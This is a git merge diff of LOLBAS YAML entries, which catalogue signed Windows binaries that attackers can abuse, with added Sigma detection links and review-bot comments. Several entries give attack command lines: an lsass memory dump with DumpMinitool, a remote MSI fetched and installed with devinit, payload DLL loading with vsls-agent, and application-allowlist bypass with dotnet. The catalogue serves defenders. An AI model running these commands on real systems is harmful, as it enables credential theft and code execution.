Merge pull request #3 from LOLBAS-Project/master

Merge master branch from official project
C-h4ck-0
2023-04-30 14:35:28 +03:00
committed by GitHub
38 changed files with 254 additions and 40 deletions


@@ -26,6 +26,7 @@ Full_Path:
Code_Sample:
- Code: https://docs.microsoft.com/en-us/windows/win32/winauto/custom-verification-routines
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
- IOC: Sysmon Event ID 1 - Process Creation
- Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
Resources:


@@ -41,7 +41,7 @@ Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
- Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
- Link: https://twitter.com/nas_bench/status/1534916659676422152
- Link: https://twitter.com/nas_bench/status/1534915321856917506
Acknowledgement:
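Review bot: the resource change swaps blog.thecybersecuritytutor.com for mrd0x.com instead of adding the new link beside the old one; confirm the new URL serves the same write-up before the old reference is dropped, and apply the same migration to the remote.exe entry later in this PR, whose resource still points at the old domain.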


@@ -23,6 +23,8 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml
Resources:
- Link:
Acknowledgement:
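Review bot: `Code_Sample` keeps an empty `- Code:` and `Resources` an empty `- Link:` while two Sigma rules are added; either fill in at least one reference or remove the empty placeholders so the YAML does not advertise missing data.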


@@ -1,7 +1,7 @@
---
Name: Cdb.exe
Description: Debugging tool included with Windows Debugging Tools.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
@@ -12,8 +12,8 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
cdb.exe -pd -pn <process_name>
.shell <cmd>
Description: Attaching to any process and executing shell commands.
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
@@ -41,7 +41,7 @@ Resources:
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
- Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
- Link: https://twitter.com/nas_bench/status/1534957360032120833
Acknowledgement:
- Person: Matt Graeber
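Review bot: the change under `- Command: |` (the two lines `cdb.exe -pd -pn <process_name>` and `.shell <cmd>`) is whitespace-only and the re-indentation is invisible after extraction; confirm both lines keep the same indentation relative to the `|` so YAML still parses them as one literal block. The author quote removal and the blog.thecybersecuritytutor.com to mrd0x.com link swap match the adplus hunk, with the same request to verify the new URL before the old one is lost.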


@@ -1,8 +1,8 @@
---
Name: Createdump.exe
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: Daniel Santos
Created: 2022-08-05
Author: mr.d0x, Daniel Santos
Created: 2022-01-20
Commands:
- Command: createdump.exe -n -f dump.dmp [PID]
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
@@ -13,7 +13,12 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
- Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
- IOC: createdump.exe process with a command line containing the lsass.exe process id
Resources:
- Link: https://twitter.com/bopin2020/status/1366400799199272960
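Review bot: the two new Visual Studio paths hard-code the runtime folder `Microsoft.NETCore.App\6.0.0\` while the edition folder already uses `*`; pinning 6.0.0 will miss other bundled runtimes, so use `Microsoft.NETCore.App\*\createdump.exe` as the two dotnet paths above do. Also the Created date moves from 2022-08-05 back to 2022-01-20 together with the author change; confirm that this is the intended original submission date rather than an accidental overwrite.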


@@ -0,0 +1,21 @@
---
Name: Devinit.exe
Description: Visual Studio 2019 tool
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: devinit.exe run -t msi-install -i https://example.com/out.msi
Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
Usecase: Executes code from a (remote) MSI file.
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
Resources:
- Link: https://twitter.com/mrd0x/status/1460815932402679809
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
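Review bot: no Detection block: the other entries in this PR carry at least a Sigma or IOC line, and a download of an MSI into C:\Windows\Installer followed by its installation is exactly the behaviour a defender wants a hook for, so add a Detection section (even a single IOC such as devinit.exe making network connections or writing under C:\Windows\Installer). The description "Visual Studio 2019 tool" is also narrower than the `*` version segment in `Full_Path`, which will match other Visual Studio releases; describe what devinit does instead.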


@@ -18,13 +18,20 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
- Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code
Category: Execute
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 with .NET Core installed
OperatingSystem: Windows 10 and up with .NET Core installed
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
@@ -35,8 +42,11 @@ Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
- Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
- Person: yamalon
Handle: '@mavinject'
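Review bot: the new `dotnet.exe fsi` command comes with no Detection change, yet the Fsi.exe and FsiAnyCpu.exe entries in this same PR gain the `proc_creation_win_lolbin_fsharp_interpreters.yml` Sigma rule; check whether that rule covers the `dotnet fsi` invocation and reference it (or an IOC) here as well. Minor: `Full_Path` quotes `'C:\Program Files\dotnet\dotnet.exe'` while the other entries leave paths unquoted.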


@@ -0,0 +1,20 @@
---
Name: DumpMinitool.exe
Description: Dump tool part Visual Studio 2022
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: Administrator
MitreID: T1003.001
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Resources:
- Link: https://twitter.com/mrd0x/status/1511415432888131586
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
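Review bot: `Full_Path` stops at the `...\TestPlatform\Extensions` directory and never names `DumpMinitool.exe`, unlike every other entry; append the file name, and consider `*` in place of the fixed `2022\Community` segment as the Createdump and Devinit paths do. The example command also embeds a personal path `c:\users\mr.d0x\dump.txt`; a neutral placeholder reads better. Lastly, "Dump tool part Visual Studio 2022" is missing "of", and a T1003.001 entry with Administrator privileges ships without any Detection section.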


@@ -1,4 +1,3 @@
---
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
@@ -28,6 +27,7 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Fsi.exe execution may be suspicious on non-developer machines
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/


@@ -25,6 +25,7 @@ Code_Sample:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:


@@ -26,6 +26,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
Resources:
- Link: https://twitter.com/0rbz_/status/988911181422186496
Acknowledgement:


@@ -0,0 +1,21 @@
---
Name: Microsoft.NodejsTools.PressAnyKey.exe
Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
Resources:
- Link: https://twitter.com/mrd0x/status/1463526834918854661
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
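Review bot: missing Detection section for a new Execute entry; add at least an IOC (for example Microsoft.NodejsTools.PressAnyKey.exe spawning a child process, which the Description already identifies as the behaviour). The positional arguments `normal 1` in the command are unexplained; a short note on what they mean would help readers validate a detection.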


@@ -28,6 +28,7 @@ Full_Path:
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
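Review bot: the two `Full_Path` entries are identical (`C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe` twice); by analogy with the MSPUB entry, one of them should presumably be the `C:\Program Files (x86)\...` variant. Fix the path or drop the duplicate.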


@@ -25,6 +25,7 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'


@@ -32,6 +32,7 @@ Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Acknowledgement:
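Review bot: the resource link still points at blog.thecybersecuritytutor.com although the adplus and Cdb entries in this PR migrate that domain to mrd0x.com; update it for consistency, and note that the path segment `Exeuction-AWL-Bypass-Remote-exe-LOLBin` carries a typo which may or may not be part of the real slug, so verify the URL resolves. The Sigma link is pinned to a different commit (197615...) from the rest of the PR, which is fine as long as the rule exists at that revision.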


@@ -44,6 +44,8 @@ Full_Path:
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889


@@ -16,6 +16,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
- IOC: VSIISExeLauncher.exe spawned an unknown process
Resources:
- Link: https://github.com/timwhitez


@@ -1,4 +1,3 @@
---
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
@@ -19,6 +18,7 @@ Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/


@@ -17,6 +17,7 @@ Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/


@@ -31,6 +31,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml
- IOC: Suspicious Office application Internet/network traffic
Resources:
- Link: https://twitter.com/reegun21/status/1150032506504151040


@@ -0,0 +1,22 @@
---
Name: vsls-agent.exe
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Created: 2022-11-01
Commands:
- Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml
Resources:
- Link: https://twitter.com/bohops/status/1583916360404729857
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
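Review bot: the Sigma link uses `blob/master/` while every other Sigma reference in this PR pins a commit hash; pin it so the link survives a rename or move of the rule. Also `Full_Path` covers only `2019\Professional` with a lowercase drive letter, whereas the other Visual Studio entries use `*` for the version and edition segment, which would fit here too given the OperatingSystem note about other Visual Studio versions.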